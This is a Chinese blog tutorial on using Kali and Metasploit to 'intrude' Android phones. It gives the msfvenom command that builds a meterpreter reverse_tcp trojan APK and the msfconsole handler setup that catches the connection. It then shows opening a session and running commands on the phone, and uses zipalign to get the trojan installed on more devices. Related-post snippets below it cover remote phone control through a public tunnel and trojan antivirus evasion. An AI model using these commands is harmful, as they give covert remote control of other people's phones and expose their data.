Kali环境使用Metasploit生成木马入侵安卓手机

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

环境准备:

Kali2.0(msfVENOM、metasploit)
安卓手机或安卓模拟器

利用过程:

先查看本地IP地址

使用msfvenom生成apk木马

1

msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.105.184 LPORT=5555 R > /root/apk.apk

注释:

LHOST = 接收反弹连接主机

LPORT = 接收反弹连接主机的监听端口

172.16.105.184修改为本地的IP地址 5555是生成的端口号/root/apk.apk是生成的APK路径

如显示下图所示说明生成成功!

启动msfconsole

输入命令:

1

msfconsole

然后执行以下命令

1

2

3

use exploit/multi/handler //加载模块

set payload android/meterpreter/reverse_tcp //选择Payload

show options //查看参数设置

这个payload里边有两个参数要设置

LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置

1

2

3

set LHOST 172.16.105.184 //这里的地址设置成我们刚才生成木马的IP地址

set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口

配置完成后我们可以执行

1

show options //查看是否配置成功

最后我们把生成后的APK文件安装到模拟器或者手机中然后执行

1

exploit //开始执行漏洞 开始监听,等待手机上线

我们可以发现有一个ID与本机处于连接状态,现在我们可以执行

1

2

sessions //查看连接状态

sessions 1 //建立与ID值位1的主机连接

现在我们可以执行

1

sysinfo

更多命令参数可以使用help命令查看

PS:如果在操作过程中有什么不懂的或遇到什么问题可以在文章下方留言小残看到后悔第一时间为大家解答

如果遇到部分手机会无法安装生成后发APK文件那么我们可以zipalign工具优化处理

1

zipalign -v 4 apk.apk  napk1.apk

标签:漏洞

原文地址:https://www.cnblogs.com/hackhyl/p/9532427.html

时间: 2024-08-28 14:29:57

Kali环境使用Metasploit生成木马入侵安卓手机的相关文章

利用kali生成木马远程控制安卓手机

首先控制安卓手机,需要生成一个木马,生成后门 kali的IP地址:172.16.3.45 1.要达到远程控制安卓手机,你需要避开公网,所以在这里可以去买条隧道,我使用的是natapp里面的隧道 在natapp里面注册登录,可以去免费领取一条隧道,也可以去购买隧道,都很实惠的 2.获得隧道对应的IP地址以及端口号 首先配置隧道参数 ip地址选择你的kali的IP地址,本地端口尽量选择高位端口 下载natapp,打开 natapp -authtoken=**********   (********为

exchange2010安卓手机无法配置exchange邮件

今天朋友给我反馈了一个问题,他所在的公司所有安卓手机无法配置exchange邮箱,提示:"验证失败,请检查网络 连接或服务器设置"但是PC端outlook却没有问题. 经过各种方式验证,服务器的内网外解析都没有问题.autodiscover也没有问题 做测试的时候发现新创建的邮箱是可以使用的.朋友反馈说这个公司是在别的公司分出来的,做过AD账号迁移 想到是否用户权限是存在问题 所以将新邮箱的权限和老邮箱的权限进行对比是否有什么区别 打开新邮箱的安装选项,选择高级 如下两张图所示.以前的

Metasploit实现木马生成、捆绑、免杀

Meatsploit介绍 Metasploit是一款优秀的开源(!= 完全免费)渗透测试框架平台,在该平台下可以方便的实施渗透测试,Meatsploit具有繁多的接口.模块等等,甚至允许用户自己编写自己的模块使用.在Metasploit框架下可以方便的实现木马的生成.捆绑.免杀.实验楼网站存在此节课程但是是收费的,How frustrating,,,,so,,,,,:) 0X01选择攻击载荷 首先,开启终端,键入:"msfconsole",进入metasploit控制台. 键入&quo

使用msfvenom生成木马用于监听别人的操作

msfvenom Options: -p, –payload < payload> 指定需要使用的payload(攻击荷载).如果需要使用自定义的payload,请使用& #039;-& #039;或者stdin指定 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, –nopsled < length> 为payload预先指定一个NOP滑动长度 -f,

更新Kali中的metasploit

1. Kali中的metasploit默认使用apt-get进行更新,看一下metasploit路径中的.apt文件. 默认情况下会出现这种情况 # msfupdate [*] [*] Attempting to update the Metasploit Framework... [*] [*] Checking for updates via the APT repository [*] Note: expect weekly(ish) updates using this method [

在安卓手机上学习C语言 - 安卓手机C/C++编译环境的搭建 : 程序世界的创建

   在安卓手机上学习C语言           安卓手机C/C++编译环境的搭建 : 程序世界的创建 在电脑上运行的QQ,手机上的QQ都是程序, 这些通电就能用的神奇玩意, 如果我说它们都是程序员用一个一个英文字母,数字,奇奇怪怪的符号创造出来的,我想那些没有任何概念的朋友可能会感到惊讶. 是的, 在没有揭开程序世界的神秘面纱之前, 一切都是那么神奇. 实际上, 程序确实是用一个一个英文字母(或者说拼音字母...)来写出来的, 就和写小说一样写出来的. 但是并不是写完之后把写出来的内容保存到一

Windows环境中,通过Charles工具,抓取安卓手机、苹果手机中APP应用的http、https请求包信息

Windows环境中,通过Charles工具,抓取安卓手机.苹果手机中APP应用的http.https请求包信息1.抓取安卓手机中APP应用的http请求包信息1)在电脑上操作,查看Windows机器IP地址:cmd->ipconfig 在返回的结果中,查询得到IPv4地址. a)如果你的Windows机器是通过无线方式上网,则选择 无线局域网适配器 中的IPv4中IP地址. b)如果你的Windows机器是通过有线方式上网,则选择 以太网适配器 中的IPv4中IP地址. 2)在手机上操作,在你

安卓手机APP压力monkey测试

一.Monkey概述 Monkey是Android中的一个命令行工具,可以运行在模拟器里或实际设备中.它向系统发送伪随机的用户事件流(如按键输入.触摸屏输入.手势输入等),实现对正在开发的应用程序进行压力测试.Monkey测试是一种为了测试软件的稳定性.健壮性的快速有效的方法.Monkey测试是Android平台下自动化测试的一种快速有效的手段. 二.环境配置 JDK配置:根据自己的电脑系统位数,选择适当的JDK,若自己电脑系统是32位,尽量也选择使用32位的JDK,在此以此为例进行详解.JDK

安卓手机应用开发培训讲义笔记和心得(Java和Mono两种模式)

培训内容    —————————————————————————————————————————————————————————————————— 昨天夏主要讲了两个方面的安卓手机开发 一:Java语言开发手机安卓 ① 准备发软件工具  环境   (可以直接本地搭建环境) 开发IDE:Eclipse(仅次于VS的强大IDE) 其它一大堆的东西:Android SDK  模拟器   SDK JDK DAT ②  window下搭建Eclipse+andro开发环境 安装步骤:一般首先安装ava运